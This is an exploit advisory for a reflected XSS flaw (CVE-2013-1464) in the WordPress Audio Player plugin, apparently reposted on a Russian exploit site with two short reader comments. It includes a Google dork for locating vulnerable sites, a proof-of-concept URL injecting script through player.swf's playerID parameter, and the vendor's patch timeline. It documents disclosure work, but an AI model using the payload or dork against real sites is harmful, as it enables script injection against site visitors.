WordPress Audio Player Plugin XSS in SWF

# Exploit Title: WordPress Audio Player Plugin XSS in SWF
# Release Date: 31/01/13
# Author: hip [Insight-Labs]
# Contact: hip@insight-labs.org | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip
# Vendor Homepage: http://wpaudioplayer.com/
# Tested on: XPsp3
# Affected version: 2.0.4.6 before
# Google Dork: inurl:/wp-content/plugins/audio-player/
#Ref:CVE-2013-1464
————————————————————————————————————————
# Introduction:
Audio Player is a highly configurable but simple mp3 player for all your audio needs.
————————————————————————————————————————-
# XSS — Proof Of Concept:

vulnerable path:
/wp-content/plugins/audio-player/assets/player.swf
vulnerabile parameter:playerID

POC:
/wp-content/plugins/audio-player/assets/player.swf?playerID=a\»))}catch(e){alert(1)}//

————————————————————————————————————————-
————
Patch:
————
— Vendor was notified on the 23/01/2013
— Vendor released version 2.0.4.6 on 30/01/2013 Fixed the bug
————————————————————————-

Комментарии (2 комментария) на "WordPress Audio Player Plugin XSS in SWF"

  1. Да, прощание всегда тяжело, но возвращение иной раз еще тяжелее.
    (c)Эрих Мария Ремарк

  2. Хм… даже такое бывает.

Отправить комментарий

Другие статьи рубрики "Эксплоиты-Wordpress"